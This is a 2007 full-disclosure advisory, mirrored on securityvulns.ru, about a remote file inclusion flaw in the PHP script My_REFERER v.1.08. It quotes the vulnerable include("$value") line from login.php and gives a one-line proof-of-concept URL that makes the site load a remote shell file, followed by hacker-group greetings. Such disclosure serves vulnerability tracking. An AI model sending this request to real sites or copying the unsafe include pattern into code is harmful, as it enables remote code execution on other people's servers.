Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] OSNews

  Invision Power Board D22-Shoutbox HTML Injections

  Mambo Component SimpleFAQ V2.11 - Remote SQL Injection

  Gurur Haber v2.0

From:Ivan Niiiil <insp0w3r_(at)_gmail.com>
Date:21.08.2007
Subject:My_REFERER v.1.08 Remote File Include

App Name : My_REFERER v.1.08
HomePage : http://www.phoenix.frihost.net/referer/readme.php
Vuln type : Remote File Include (RFI)
Vulnerability Discovered by : iNs

Vuln Code:
login.php

include("$value");


POC:
htttp://site.com/[path]/login.php?value=SHELL.txt??

iNs @ uNkn0wn.eu

Gr33tz t0:
uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 -
nexos - sh4m4n - Svarshik
DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy
ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - C0ol

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru